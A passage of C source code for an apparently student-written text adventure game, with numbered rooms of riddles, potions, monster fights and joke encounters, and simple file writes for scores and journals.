sizeof(riddleTwo), stdin); result = strcmp(riddleTwo, riddle2); } while (result !=0); printf("Your question is: %s\n", riddle2); printf("The correct question is: %s\n", riddleTwo); printf("That is divine! You are a mental giant, %s\n", name); do { printf("\nEnter your question for Riddle #3: "); fgets(riddle3, sizeof(riddleThree), stdin); result = strcmp(riddleThree, riddle3); } while (result !=0); printf("Your question is: %s\n", riddle3); printf("The correct question is: %s\n", riddleThree); printf("Brainiac! You got a real Einstein brain, wizard, %s\n", name); com = combo(); printf("You need this number combination to open Box C : %d", com); printf("\nYou have 10 seconds to memorize the given combination."); puts(" Enter the combination after the prompt."); countDown(); printf("\nEnter the given combination to unlock the box now: "); scanf("%d", &num); while (num !=com) { puts("Enter the correct combination before Godzilla swallows you!\n"); scanf("%d", &num); } puts("\nPut your hand in box 3 and grab what is inside"); puts("You have chosen wisely! Take the key and escape to freedom."); puts("Choose another room on your way out.\n"); break; } else { return 1; } } break; } case 2: { while(choice != 99) { char drinkChoice[10]; puts("You open the door and see a table, on top are three potions."); puts("You hear the door lock behind you."); puts("The first is a blue potion, the second is a cloudy green,"); puts("the third is as black as the night sky"); puts("Which potion would you like to drink? (blue / green / black)"); scanf("%s", &drinkChoice); if(strcmp(drinkChoice, "blue") == 0) { puts(""); puts("You taste pineapples before you fall asleep and can't help but ask why?"); bluePotionWorld(); puts(""); break; } else if(strcmp(drinkChoice, "green") == 0) { puts("You notice it tasted like rancid milk"); puts("You begin to feel nauseous...."); puts("You have died."); exit(0); break; } else if(strcmp(drinkChoice, "black") == 0) { puts("An interesting choice!"); blackPotionEffect(); puts(""); break; } scanf("%d",&choice); } break; } case 3: { srand(time(NULL)); //Used for critical strike for the bow int boss[] = {0,0,0,0,0,0,1}; int item[] = {1,1,1}; char area[9][200] ={ "You are in a Grave Yard surrounded by cliffs\n", "You are standing on a cliff side\nBehind you is a graveyard\nIn front you see a shrine with a fading light\n", "You are in a shrine.\nIn the middle you see a small bonfire.\nTo your left you see a wooden door\nForward You see a silver door.\nTo your right you see a black door\n\n", "You are standing in what looks like an old library.\n", "You are standing in what looks like an old temple. the ground looks burned from fire and an ominus glow comes from the celing.\n", "You are standing on a black island. Surrounded by a lake of fire.\nThe door you came through is encased on light.\n", "Black fire seems to spew from the bonfire.\n Filling the room and encompassing the shrine.\nAll Light fades.\nAre you alone?\n" }; int loc = 0; //used for map placement int move; //used for map progression int end = 0; //Used to end game int wep; //wepon damage int *wepP; //used to enter functions wepP = &wep; int health; //player health int swdmg = 20; // sword - short range int bowdmg = 10; // far range - low dmg - has crit int sffdmg = 50; // sorsory - far range / high dmg but 1 move cast time int kndmg = 5; //bleed dmg but have to be close //wepon ranges int wepr; int swra = 10; int bowra = 30; int sffra = 50; int knra = 5; puts("You awake on the ground in a graveyard.\n"); puts("You stand up and see 4 weponds at your feet:\n1 - Sword\n2 - Bow\n3 - Knife\n4 - Staff\n0 - to quit\nWhat do you grab"); int ch; scanf("%d",&ch); //Wepon choice switch(ch) { case 1: wep = swdmg; wepr = swra; printf("Wepon damage: %d\n",wep); printf("Wepon range: %d\n",wepr); printf("So I see that you have chosen the knight class\n"); puts("Knights are tough. Lets see if you are tough enough."); health = 100; printf("Health: %d\n",health); break; case 2: wep = bowdmg; wepr = bowra; printf("Wepon damage: %d\n",wep); printf("Wepon range(units): %d\n",wepr); printf("So I see that you have chosen the Ranger class\n"); puts("Rangers are must have quick wits. Lets see if you can think on your feet."); health = 60; printf("Health: %d\n",health); break; case 3: wep = kndmg; wepr = knra; printf("Wepon damage: %d\n",wep); printf("Wepon range(units): %d\n",wepr); printf("So I see that you have chosen the Theif class\n"); puts("Theifs rely on getting in close. Can you close the gap?\n"); puts("Theifs have bleed dmg - every 4 attacks issues 4 x your base damage\n"); health = 50; printf("Health: %d\n",health); break; case 4: wep = sffdmg; wepr = sffra; printf("Wepon damage: %d\n",wep); printf("Wepon range(units): %d\n",wepr); printf("So I see that you have chosen the Wizard class\n"); puts("Wizards are old and wise. Do you have the mind to survive?\n"); health = 60; printf("Health: %d\n",health); break; case 0: puts("I guess that will be the end of it"); puts("You crawl into an empty grave and die\n"); end = 2; break; default: wep = 2; wepr = 1; printf("Wepon damage: %d\n",wep); printf("Wepon range(units): %d\n",wepr); puts("Empty Handed it will be."); puts("You must be a fool...."); health = 10; printf("Health: %d\n",health); } //game while(end != 2) { end: printf("%s",area[loc]); switch(loc) { case 0: //Graveyard Site puts("1 - Towards cliffs\n"); scanf("%d",&move); if(move == 1){ loc++; } else puts("You are in a canyon!\nOnly can go forward adventurer."); break; case 1: //Cliffs (Zombie Fight) { //Zombie fight if(boss[loc] == 1) { boss[loc] = zom(health,wepP,wepr); if(boss[loc] == 2) { dead(); end = 2; } } else { move = 0; puts("1 - Go towards Shrine\n2 - Back to GraveYard"); scanf("%d",&move); if(move == 1) { loc++; } else if(move == 2) { loc--; } else puts("Error input!"); } break; } case 2: //Shrine { if(item[0] + item[1] + item[2] == 3) { puts("The Bonfire is going steadily, occationally flickering\nflame....dear...flame.\n"); } if(item[0] + item[1] + item[2] == 6) { puts("The Bonfire is now roaring with vigor.\nDo you know where the marshmellows are?"); } if(item[0] + item[1] + item[2] == 9) { puts("The Bonfire is now enveloping the entire shrine. You stare into the flame.\nIs there something staring back at you?"); puts("Would you like to finish the game?"); puts("1 - Yes\n2 - No!"); scanf("%d",&ch); if(ch == 1) { loc += 4; goto end; } } //Adding items to the fire move = 0; if(item[0] == 2) { ch = 0; puts("It seems you have a tome."); puts("Would you like to add it to the bonfire?\n1 - Yes\n2 - No"); scanf("%d",&ch); if(ch == 1) { puts("To add the tome the inscription reads:\nSpeak Friend Then Add"); puts("What is the code?"); char msg[20]; char rid[] = {"mellon"}; scanf(" %s",msg); int i; for(i = 0; msg[i]; i++) { msg[i] = tolower(msg[i]); //String manipulation } if(strcmp(msg,rid) == 0) { item[0] = 3; puts("You see the bonfire ignight with life.\n"); } else { puts("Nothing happens..."); } } else { puts("You do nothing\n"); } } if(item[1] == 2) { int ch = 0; puts("It seems you have the black sword."); puts("Would you like to add it to the bonfire?\n1 - Yes\n2 - No"); scanf("%d",&ch); if(ch == 1) { item[1] = 3; puts("You see the bonfire ignight with a reddish flame!\n"); } else { puts("You do nothing\n"); } } if(item[2] == 2) { int ch = 0; puts("It seems you have the eye!"); puts("Would you like to add it to the bonfire?\n1 - Yes\n2 - No"); scanf("%d",&ch); if(ch == 1) { item[2] = 3; puts("You see the bonfire roar to life!\n"); } else { puts("You do nothing\n"); } } move = 0; puts("1 - Open Wooden Door\n2 - Open Silver Door\n3 - Open Black Door\n4 - Go back towards the cliffs\n"); scanf("%d",&move); if(move == 1) { loc++; } else if(move == 2) { loc+=2; } else if(move == 3) { loc+=3; } else if(move == 4) { loc--; } else puts("Wrong input Adventurer!\n"); break; } case 3: //wooden Door { if(boss[loc] == 1) { boss[loc] = wiz(health,wepP,wepr); if(boss[loc] == 2) { dead(); end = 2; } item[0] = 1; } else { if(item[0] == 1) { int ch; puts("You see the wizards body still clutching his tome.\n"); puts("Grab it?\n1 - Yes\n2 - No\n"); scanf("%d",&ch); if(ch == 1){ puts("You unwind the wizards fingers from his tome."); item[0] = 2; } else puts("You leave it be\n"); } else { move = 0; puts("1 - Go towards Shrine\n"); scanf("%d",&move); if(move == 1) { loc = 2; } else if(move == 2) { loc--; } else puts("Error input!"); } } break; } case 4: //Silver door { if(boss[loc] == 1) { boss[loc] = kni(health,wepP,wepr); if(boss[loc] == 2){ dead(); end = 2; } else { item[1] = 1; } } else { if(item[1] == 1) { int ch; puts("The Dark Knights sword stands piercing the floor.\nA dark magic bleeds from the hilt\n"); puts("Take the sword?\n1 - Yes\n2 - No\n"); scanf("%d",&ch); if(ch == 1){ puts("You pull the sword from the ground\nA Dark energy surrounds you and the ground around you turns to black."); item[1] = 2; } else puts("You leave it be.\n"); } else { move = 0; puts("1 - Go towards Shrine\n"); scanf("%d",&move); if(move == 1) { loc = 2; } } } break; } case 5: //black Door { if(boss[loc] == 1) { boss[loc] = dem(health,wepP,wepr); if(boss[loc] == 2) { dead(); end = 2; } else { item[2] = 1; } } else { if(item[2] == 1) { int ch; puts("The demons body dying on the floor, its eyes shimering red.\n"); puts("Grab it?\n1 - Yes\n2 - No\n"); scanf("%d",&ch); if(ch == 1){ puts("You take the demon's eyes from its head."); item[2] = 2; } else puts("You leave it be\n"); } else { move = 0; puts("1 - Go towards Shrine\n"); scanf("%d",&move); if(move == 1) { loc = 2; } } } break; } case 6: //Boss fight { if(boss[loc] == 1) { boss[loc] = ang(health,wepP,wepr); if(boss[loc] == 2) { dead(); end = 2; break; } else { puts("Congratulations you have won!"); FILE *ptr; ptr = fopen("Door 3 - cert","a+"); fprintf(ptr,"Name: %s\nDoor 3 Completion!",name); //file manipulation puts("Restarting program!"); char z; scanf(" %c",&z); end = 2; } } break; } default: puts("an error has occured!"); end = 1; } } break; } case 4: { while(choice != 99) { puts("you open the door and find ........"); scanf("%d",&choice); } break; } case 5: { while(choice != 99) { int num, sum, i; int arr[5]; int* ptr1 = arr; FILE* wptr; char cArr1[6] = "linux"; char cArr2[6]; char cArr3[70] = "At Last all The monsTERS hAve BEen Defeated. You are safe, for now"; char* ptr2 = cArr3; wptr = fopen("filewritemonster.dat", "w"); fprintf(wptr, "%s\n", cArr1); num = randomAscii(); fillSumArray(ptr1, 5); puts("you open the door and find ........"); puts("the loop monster!"); while(choice != num) { puts("the loop monster will end its reign of terror if you enter"); puts("the magic number it seeks"); printf("hint: the ascii value for %c\n", num); scanf("%d", &choice); if(choice != num) { puts("wrong answer! please try again"); } } puts("the loop monster has seized to exist"); puts("but a new evil lurks ahead..."); puts("the array monster!"); printSumArray(ptr1, 5); puts("the array monster will let you go free should you enter the sum of the values above"); scanf("%d", &choice); sum = sumRandomArray(ptr1, 5); while(choice != sum) { puts("incorrect answer, please try again"); scanf("%d", &choice); } puts("the array monster's reign of terror has ended"); puts("but your still not safe..."); puts("the file write monster awaits you!"); puts("the file write monster wrote a file that contains the magic word to get past him"); puts("the file is called filewritemonster.dat"); scanf("%s", cArr2); while(strcmp(cArr1, cArr2) != 0) { puts("incorrect answer! please try again"); scanf("%s", cArr2); } puts("the mighty file write monster has been defeated"); puts("but now we have reach a room with three mysterious doors"); puts("only one leads to safety, and the others to monsters"); puts("no hints, choose a door and accept your fate"); scanf("%d", &choice); switch(choice) { case 1: puts("the ghost of the loop monster! he wants another magic number..."); num = randomAscii(); printf("hint: the ascii value for %c\n", num); scanf("%d", &choice); while(choice != num) { puts("wrong answer, please try again"); scanf("%d", &choice); } break; case 2: puts("the ghost of the array monster! time for another addition problem"); fillSumArray(ptr1, 5); printSumArray(ptr1, 5); sum = sumRandomArray(ptr1, 5); puts("please enter the sum of the numbers above"); scanf("%d", &choice); while(choice != sum) { puts("incorrect answer! please try again"); scanf("%d", &choice); } break; case 3: puts("no monsters behind this door... all clear to move forward"); break; default: puts("invalid input, please enter a valid number"); } puts("another close call..."); for(i = 0; i < 71; i++) { if(islower(*ptr2)) { putchar(toupper(*ptr2)); } else if(isupper(*ptr2)) { putchar(tolower(*ptr2)); } else if(*ptr2 == ' ') { printf(" "); } ptr2++; } puts(""); fclose(wptr); return; } break; } case 6: { while(choice != 99) { puts("You walk into a warehouse, and inside is large dark and damp mechanical room"); puts("You wander further in and notice it must have been abandoned for years"); puts("All of a sudden,a young man wearing a coat leaps down from a catwalk above"); puts("Hello there - said the man"); puts("How do you respond?"); puts("1. Respond with Hello"); puts("2. Ignore him and walk away"); puts("3. Respond with General Kenobi"); scanf("%d", &choice); if(choice ==1) { puts("You respond with Hello, sit down and he brings out a small kettle from his bag and brews tea for two"); puts("Congradualations on making a friend"); puts("Achievement unlocked ... The happy ending!"); break; } else if(choice ==2) { puts("you ignored the man and attempt to walk away out of the building. He tells you to freeze and pulls out a broom stick. As you stare at him confused, he charges towards you and knocks you out... To be continuted...."); break; } else if (choice ==3) { puts("You respond with 'General Kenobi'. He stares at you and says 'how do you know that name?' He takes out a broomstick and is ready to attack, when you are able to dodge his attack and run towards a wall. There is a large metal door, you run in and slam it shut behind you and it locks, keeping you safe... for now."); break; } else { puts("You have choices, this isn't one of them."); } } break; } case 7: { while(choice != 99) { puts("You open the door and close it behind you"); puts("You appear to be standing on a small patch of land in the middle of a small lake."); puts("Then, your body feels light, and you slowly begin floating in mid air"); puts("You then notice that you are beginning to float upwards, and you feel as if you should be afraid, but are instead curious as you see three sources of light above you"); puts("The three sources of light appear to be gateways to alternate dimensions, so you must wade through the air to put yourself in a position to enter the dimension of your choosing"); puts("The three choices are 1) light 2) grey 3) dark"); scanf("%d", &x); if(x == 1) { puts("You make it through the light portal and land face first in a field of grass."); puts("As you look up, you are in awe of the environment around you. You see green, grassy, plains and hills extending out to the horizon in every possibile direction you look"); puts("You begin flying, feeling the slight breeze in your face, and looking down at all of the waterfalls and lakes within all of the green hills and plains."); puts("You are taking the entire scene in, and as you look out to the horizon you see the sun shining very brightly, which temporarily distorts your vision"); puts("Once your vision clears up, you notice that you are rapidly falling through the sky, and brace for impact as you are about to land in a lake."); puts("The end"); break; } else if(x == 2) { puts("You make it through the grey portal and immediately feel the cold weather."); puts("You look around you, and all you see is mountains and hills completely covered in snow"); puts("You begin flying through this cold, white, mysterious terrain, then you notice that the snow is falling a lot quicker"); puts("The snow makes it so hard to see that you decide to fly all the way up but lose control of your flying and become trapped in a snowstorm"); puts("The end"); break; } else if(x == 3) { puts("You make it through the dark portal and fall face first into a field of white grass"); puts("You look up and notice the sunset, and white, grassy, plains and hills that extend out to the horizon in every direction you look"); puts("You begin flying, taking in the scenery, and feeling the rain in your face, when suddenly you see a black void destroy everything behind you."); puts("The end"); break; } else { puts("Wrong choice"); } } break; } case 8: { while(choice != 99) { puts("you open the door and find ........"); scanf("%d",&choice); } break; } case 9: { while(choice != 99) { puts("you open the door and find a hideous cat. It's wearing a cloak to hide from the bright light.\n"); puts("It's so ugly you stare amazed, and forget to close the door."); puts("Choice 1: Say hello\n."); puts("Choice 2: Tell the cat your a dog person.\n"); puts("Choice 3: Tell the cat your on a search for treasure..\n"); puts("Choice 4: Just stare... like a weirdo\n"); puts("What do you do?"); scanf("%d",&choice); if(choice == 1) { puts("Leave me be, stranger.\n."); } else if(choice == 2) { puts("About a year ago, I came upon a wishing well and approached it with the few coins I had left. I wished to be born as a great husky in the next life."); } else if(choice == 3) { puts("Your search ends here, you seem to have searched far and wide. I'll tell you the treasure is hidden further inside. The dungeon is filled with 25 rooms, your search is almost over."); } else if(choice == 4) { puts("Stop staring you weirdo or you might get turned to stone."); } break; } break; } case 10: { while(choice != 99) { FILE *wptr; FILE *writer; int a[5]={1223,1323,1219,1292,1238}; int b[5]={2321,2101,2290,2303,2239}; char day[5]; int dayNumber; int dayNum[5]; char textG[1000]; int counter=0; int i; int arry[5]={0}; int *ptr = arry; int SIZE=20; char gobarray[SIZE]; puts("\n\nYou open the door and find a unicorn eating gold bars. And is protected by a goblin"); printf("Save the gold bars? Enter 1 for yes. 2 for no."); scanf("%d",&choice); if(choice==1) { puts("As you try to pick up the gold bar a goblin comes out and tries to attack you"); printf("Try to attack or run away? Enter 1 to fight. 2 to run "); scanf("%d",&choice); if(choice==1) { choice=goblin(choice); printf("You are left with %d health after that short battle.\n",choice); puts("You pick up the gold bar and as you hold it in your hand it begins to shine"); puts("You get teleported to another room, all there is a bed, desk, and a door behind you"); puts("You decide to walk to the desk and notice a book, a quill and ink."); puts("You first decide to open and write into the book."); writer = fopen("goblinJ.txt","w"); fprintf(writer,"Day 5 I just slayed a goblin and think I may be in his room after being teleported. I have a strange feeling about today\n"); if(writer==NULL) { puts("Error reading file. file may not exist."); } wptr = fopen("goblinJ.txt","r"); while(!feof(wptr)) { fscanf(wptr,"%s",textG); if(feof(wptr))break; dayNum[counter]=dayNumber; counter++; } for(i=0; i<counter;i++) { printf("%s",textG); } fclose(wptr); fclose(writer); puts("You realize that maybe this journal belongs to the goblin you just slayed."); puts("You continue to explore the room and open drawers at the desk, and find mail"); puts("As you begin to open the mail it sucks you in and leaves no trace of you ever being there..."); puts("YOU DIED.."); puts("Open goblinJ.txt to check what your character wrote."); choice=99; } else { printf("You didn't take out your sword and the goblin attacks. You Died.\n"); choice=99; } } else { printf("\n\nYou decided not to pick up the gold. You leave and the goblin goes back into hiding\n"); printf("You decide to walk past the unicorn and come to a pathway labled 'Pathway A'\n"); puts("\nAs you walk closer to the pathway, a door appears"); puts("\nOn the face of the door it says: 'Arrange these number in numerical order to enter!'\n"); randomFillGob(ptr); printerGoblin(ptr); puts("\nAfter some time of sorting numbers..."); sorterGoblin(ptr); puts("..."); puts("..."); puts("..."); printerGoblin(ptr); puts("\nThe door speaks: 'Good job now enter the puzzle room'"); puts("In the middle of the room there is a crystal ball. You walk up to the crystal ball.."); printf("\nThe crystal ball speaks..'Hello there %s'\n",name); printf("\n%s please swap these to get a wish granted.\n",name); printf("\nIn front of you are two books full of dates in them\n"); for(i=0; i<5; i++) { printf("First book: %d\n",a[i]); printf("Second book: %d\n",b[i]); } printf("\nOnce again after some swapping...\n"); puts("..."); puts("..."); puts("..."); for(i=0;i<5;i++) { int swp = a[i]; a[i]=b[i]; b[i]= swp; } for(i=0; i<5; i++) { printf("First book: %d\n",a[i]); printf("Second book: %d\n",b[i]); } printf("\nFinally done..You show the Crystal Ball the two books.\n"); printf("\nShe grants you one wish..and you wish for this all to be over.\n"); printf("\nA bright Flash that blinds you appears and..\n\n"); break; //choice=99; } } break; } case 11: { while(choice != 99) { char arrCh[30], enemyName[30], *enPtr, *nmPtr; int health[5] = {10, 15, 20, 0, 0}, temp=0, *ptr; srand(time(NULL)); ptr = health; nmPtr = name; enPtr = enemyName; rm11Dialog(1, enPtr, nmPtr); scanf("%s", arrCh); if(strcmp(arrCh, "yes") == 0) { rm11EnemyName(enPtr); rm11Dialog(2, enPtr, nmPtr); rm11Battle(ptr, enPtr, nmPtr); choice = 99; } else { rm11Dialog(0, enPtr, nmPtr); choice = 99; } } break; } case 12: { while(choice != 99) { } break; } case 13: // this is mine { while(choice != 99) { puts("You open the door and enter, closing it shut behind you. The door seals airtight, so hopefully no water will leak..."); puts("There is a single lightbulb hanging from the ceiling. Underneath it is a yellow sphere..."); puts("The dimly lit sphere floats in place, slowly bobbing up and down..."); puts("You cannot see anything else in the room."); puts("What will you do?"); puts("1. Inspect the sphere."); puts("2. Open the door."); scanf("%d",&choice); if(choice == 1) { puts("The sphere turns slowly, revealing a an emoji-esque face..."); puts("Its eyes widen, pupils dilated."); puts("A human-like hand uncloaks itself from the darkness, holding a gun..."); puts("You hear the gun click, and the sphere opens its mouth, revealing 2 rows of large molars"); puts("The gun's barrel is fixated on you, and before you have time to preemptively act..."); puts("The words sound from the its mouth, reverberating through the room, ringing clear through your eardrums."); puts("\n=-=-= \" V I B E C H E C K \" =-=-=\n"); puts("What do you do?"); puts("1. Open the door."); puts("2. Laugh nervously."); puts("3. Laugh wholeheartedly."); puts("4. Sob in terror."); puts("5. Growl in anger."); scanf("%d",&choice); if (choice == 1) { puts("The water from outside rushes in, filling the room!"); puts("With your last breath you can see the emoji-sphere shaking its head in disappointment..."); choice = 99; } else if (choice == 2) { puts("\n=-=-= VIBE CHECK FAILED =-=-=\n"); puts("The last thing you hear is a single gunfire..."); choice = 99; } else if (choice == 3) { puts("The gun lowers, as does the emoji-sphere's head, in affirmation."); puts("The lightbulb quickly glows increasingly brighter, and in a flash..."); puts("the room is fully lit, and empty, save for a door at the other end."); puts("You enter the door."); } else if (choice == 4) { puts("\n=-=-= VIBE CHECK FAILED =-=-=\n"); puts("The last thing you hear is a single gunfire..."); choice = 99; } else if (choice == 5) { puts("\n=-=-= VIBE CHECK FAILED =-=-=\n"); puts("The last thing you hear is a single gunfire..."); choice = 99; } choice = 99; } else if (choice == 2) { puts("The water from outside rushes in, filling the room!"); puts("After a brief moment of unconsciousness, you wake up in the previous room"); choice = 99; } // PART 2 int gear1 = 0; int gear2 = 0; puts("You enter another room, nearly identical to the previous one."); puts("There is a table with various items, clearly made for self-defense."); puts("There is also another door at the other end of the room, emanating an ominous VIBE"); puts("You had best prepare yourself. On the table are: "); puts("1. A large, heavy shield. (50\% damage reduction, speed penalty)"); puts("2. A smaller, more mobile buckler. (25\% damage reduction)"); puts("3. A magic wand, with an embedded red crystal. (enables fire magic)"); puts("4. A six-inch slim dagger (enables second action after attacking)"); puts("5. A poleaxe-like naginata (capable of area attacks)"); while(gear1 < 1 || gear1 > 5) { puts("Seems like you can hold two of these five items. For your first item, you choose... (1 - 5)"); scanf("%d", &gear1); if (gear1 < 1 || gear1 > 5) { puts("Invalid choice."); } } while(gear2 < 1 || gear2 > 5) { puts("And for your second choice... (each combination is unique)"); scanf("%d", &gear2); if (gear1 == gear2) { puts("You can't choose the same item twice!"); gear2 = 0; } } int gearCombo = gear1 * 10 + gear2; if (gearCombo == 12 || gearCombo == 21) { puts("Two shields? You'll make do somehow."); puts("(Shield Showdown unlocked)"); gearCombo = 12; } else if (gearCombo == 13 || gearCombo == 31) { puts("Mage tank, an unorthodox yet versatile match."); puts("(Self-Immolation unlocked)"); gearCombo = 13; } else if (gearCombo == 14 || gearCombo == 41) { puts("The weight of the shield is offset by the dagger."); puts("(Counter-Parry unlocked)"); gearCombo = 14; } else if (gearCombo == 15 || gearCombo == 51) { puts("The combination of heavy gear gives you confidence."); puts("(Steadfast Swing unlocked)"); gearCombo = 15; } else if (gearCombo == 23 || gearCombo == 32) { puts("You notice your buckler can sustain the flames from your wand."); puts("(Flaming Boomerang unlocked)"); gearCombo = 23; } else if (gearCombo == 24 || gearCombo == 42) { puts("The combination of light gear somehow makes you feel even faster."); puts("(Rapid Rushdown unlocked)"); gearCombo == 24; } else if (gearCombo == 25 || gearCombo == 52) { } } break; } case 14: { int x, y, userSelect, hp = 100, machetePower = 0; int gameScore; FILE *writer; srand(time(NULL)); int choice; while(choice != 99) { printf("%s!!, You've been abandoned on an island and must find your way to the extraction point to get home. Lets go!\n", name); puts("You're starting off with 100 hp and must navigate your way through obstacles and make the correct choices along the way."); Menu: puts("You have 3 options... where would you like to go?(Extraction point is through the river but to get a perfect score, you must go to the mountain first)"); puts("1. Beach\n2. Mountain\n3. River"); scanf(" %d", &userSelect); writer = fopen("room14.txt", "w"); if (userSelect == 1) //Beach { if(machetePower > 0) { goto BeachMenu; break; } puts("This isn't the way to the extraction point but there is a backpack here.\n"); puts("Inside you find a machete and a hundred sided die.\n"); puts("The power of the machete is not set and you will roll the magic die to set it's power.\n"); x = 1 + (rand()%100); printf("You roll and get a... %d\n", x); machetePower = x; printf("Machete Power: %d\n", x); BeachMenu: puts("There is nothing else on the beach."); puts("Pick a number\n1. Go back\n2. Chill"); scanf(" %d", &userSelect); if(userSelect == 1) { goto Menu; } else if(userSelect == 2) { puts("You kick your feet up, this is your life now. Welcome to CASTAWAY!!!\n"); castaway(); } } else if(userSelect == 2) { if(hp < 100) { puts("You've done all you can here, back you go\n"); goto Menu; } puts("You head towards the mountains with your machete"); puts("You encounter a momma bear who loves math and can talk."); puts("I eat 2 wild boars every week. If I've eaten 32 boars, how many weeks has gone by?: "); scanf(" %d", &x); if(x!= 16) { puts("I don't think so, we fight now!\n"); fightSystem(&hp, &machetePower); if(hp > 0) { puts("You've defeated the bear!\n"); gameScore += 25; puts("1. Extraction point\n2. Back where you came from?"); scanf(" %d", &userSelect); if(userSelect == 1) { goto End; } else if(userSelect == 2) { goto Menu; } break; } else { puts("You lose"); choice = 99; break; } } else { gameScore += 10; puts("Amazing, back you go"); goto Menu; } break; } else if(userSelect == 3) { puts("You decide to go towards the river and discover a troll."); puts("You must unscramble 5 words in order to cross."); puts("1. Lets Play\n2. I'm good"); scanf(" %d", &x); if(x == 1) { wordScramble(&gameScore); } else { goto Menu; } break; } } End: fprintf(writer, "User HP: %d\n", hp); fprintf(writer, "GameScore: %d\n", gameScore); puts("Check file room14.txt for your score"); fclose(writer); break; } case 15: { while(choice != 99) { char userOption[256]; char red[4]={"red"}; char blue[5]={"blue"}; char yellow[7]={"yellow"}; char stay[5]={"stay"}; char yes[4]={"yes"}; srand(time(NULL)); puts("You open the door and find 3 pills sitting on a tray. A man wearing all black asks you to take one. There is a red pill, a blue pill, and a yellow pill. Which one do you choose?"); scanf(" %s",&userOption); if(strcmp(userOption,red) == 0) { puts("You chose the red pill!"); puts("Whoa! Whats going on?? All of a sudden, the bookcase in the back of the room swings wide open! The man wearing black says, \"Any choice you want, the decision is yours and yours only.\" Do you enter the opened room or stay where you are? (Enter \"stay\" or \"go\")"); scanf(" %s",&userOption); if(strcmp(userOption,stay)==0) { puts("Why are you scared? You should just go into the room anyways. Are you sure you want to stay? (Enter \"yes\" or \"no\")"); scanf(" %s",&userOption); if(strcmp(userOption,yes)==0) { printf("Fine. You're no fun. Game over, %s.\n",name); choice = 99; break; } else { puts("Wow! You changed your mind and entered the hidden room! What happens next?"); puts("A wizard appears in front of you immediately as soon as you enter the hidden room. He asks you to pick a random number between 1 and 10."); scanf(" %s",&userOption); int i,j; i = atoi(userOption); j = randGen(10); if(i==j) printf("You guessed right! The number was %d!\n",j); else { printf("Awww man! Better luck next time. The secret number was %d.\n",j); choice = 99; break; } } } else { puts("A wizard appears in front of you immediately as soon as you enter the hidden room. He asks you to pick a random number between 1 and 10."); scanf(" %s",&userOption); int i,j; i = atoi(userOption); j = randGen(10); if(i==j) { printf("You guessed right! The number was %d!\n",j); choice = 99; } else { printf("Awww man! Better luck next time. The secret number was %d. Game over, %s.\n",j,name); choice = 99; break; } } } if(strcmp(userOption,blue) == 0) { puts("You chose the blue pill!"); printf("All of a sudden, the floor starts shifting. A huge crack starts forming just a few feet from where you are. You try your hardest to outrun the crack, but your shoes get caught. You fall into the bottomless pit of despair and are never heard from again. Game over, %s.\n",name); choice = 99; break; } if(strcmp(userOption,yellow) == 0) { puts("You chose the yellow pill!"); puts("WHOA! What on Earth is going on? All of a sudden, you are transported to a random room!"); choice = randGen(25); break; } if(strcmp(userOption,"99") == 0) choice = 99; } break; } case 16: { while(choice != 99) { } break; } case 17: { // used input output (lab 2) // used conditionals (lab 3) // used functions (lab 4) // used loops (lab 5) // used random (lab 6) // used arrays (lab 7) // used pointers (lab 8) // used string manipulation (lab 9) // used files (lab 10) while(choice != 99) { puts("\nYou open the door and find a basketball."); puts("\nAll of a sudden Shaq pops out of the dark."); puts("\nHe challenges you to a 1 on 1 game."); printf("1. You accept his challenge because Shaq aint ready for you.\n"); printf("2. You decline his challenge because it's SHAQ.\n"); printf("3. You decide to do something else.\n"); scanf("%d",&choice); if (choice == 1) { printf("\nUnfortunately, since Shaq is 7 feet 300 pounds. He dunks on you, licks his fingers and says 'bbq chicken'\n\n"); break; } else if (choice == 2) { puts("\nYou tell Shaq you're good. Shaq then challenges you to a dice roll game."); puts("The rules are simple. We roll a 12 sided die. If your result is lower than Shaq's you will lose!"); puts("\nLet the games begin!!\n"); int diceResult[2] = {0}; int *pointerDiceResult; pointerDiceResult = diceResult; rollDiceRoom17(pointerDiceResult); printf("\nYou roll a %d!\n",diceResult[0]); printf("\nShaq rolls a %d!\n",diceResult[1]); if (diceResult[0] > diceResult[1]) { printf("\nHaHa in your face Shaq. I'm outta here!!\n\n"); } else if (diceResult[0] == diceResult[1]) { printf("\nIt's a tie!! We did not calculate for this outcome. Glitch in the matrix. You're now free of the simulation. Success?\n\n"); } else { printf("\nShaq wins and starts to dance in your face. You have lost. You must now watch this dance for eternity!\n\n"); } break; } else { char insult[20]; FILE *filePtr; int numInsults = 5; filePtr = fopen("insults.txt","w"); puts("\nYou call Charles Barkely. Barkley hypocritically calls Shaq fat. Shaq tells Barkely he has no rings."); puts("Barkley needs your help to call Shaq 5 names!"); while (numInsults > 0) { printf("\nWhat do you want to call Shaq?\n"); scanf("%s",insult); fprintf(filePtr,"%s\n",insult); numInsults--; } puts("\nBarkely writes all these insults down in his file notebook."); fclose(filePtr); filePtr = fopen("insults.txt","r"); rewind(filePtr); puts("\nBarkely picks a random insult and YELLS it at Shaq!!"); char barkleyChoice[20]; fscanf(filePtr,"%19s",barkleyChoice); int j; for (j = 0; j < 20; j++) { barkleyChoice[j] = toupper(barkleyChoice[j]); } printf("Barkely calls Shaq a %s!!\n",barkleyChoice); puts("Shaq is mortified!! How could Barkley be this mean! He retaliates by calling Barkley a donut shaped human."); printf("The two continue to argue and you slip past Shaq unnoticed. Success!!\n\n"); break; } } break; } case 18: { int choice18, i, level = 1, health =100, attack=0; if(choice18 == 1 || choice18 == 2) { puts("\nThis room is empty\n"); break; } puts("You open the door and find two more doors\n"); puts("One door to the right and one door to the left ... a sign reads enter one of these doors\n"); puts("Enter 1 to enter the right door or enter 2 to enter left door\n"); scanf("%d" ,&choice18); if(choice18 == 1)//blue = 1, red = 2 { puts("you found a chest, you opened the chest and found a sword\n"); puts("You picked up the sword, congrats you now yield a sword!\n"); } else if(choice18 ==2) { puts("you found a ray gun, congrats!\n"); puts("you now wield a ray gun\n"); } puts("Suddenly a dragon appears out of no where.... get ready to fight\n"); puts("The dragon has 100 health\n"); puts("Press 5 followed by enter to deal damage to the dragon\n"); scanf("%d", &attack); while(health > 0) { health-=20; printf("You attacked the dragon. the dragon now has %d health\n", health); if(health == 0) { puts("\nyou killed the dragon.... \n"); level++; puts("\nYou move on to the next level\n"); break; if(level !=1) puts("\nThe dragon falls and a door appears, you walk towards the door, you open it...\n"); } if(attack != 5) { puts("you ran away"); break; } puts("Press 5 to attack again or any other num to run\n"); scanf("%d", &attack); } if(level == 1) puts("\nThe dragon falls and a door appears, you open it...\n"); break; } case 19: { while(choice != 99) { GameRules(); int againPtr; FILE *fptr; char solution[WORDSIZE+1]; char 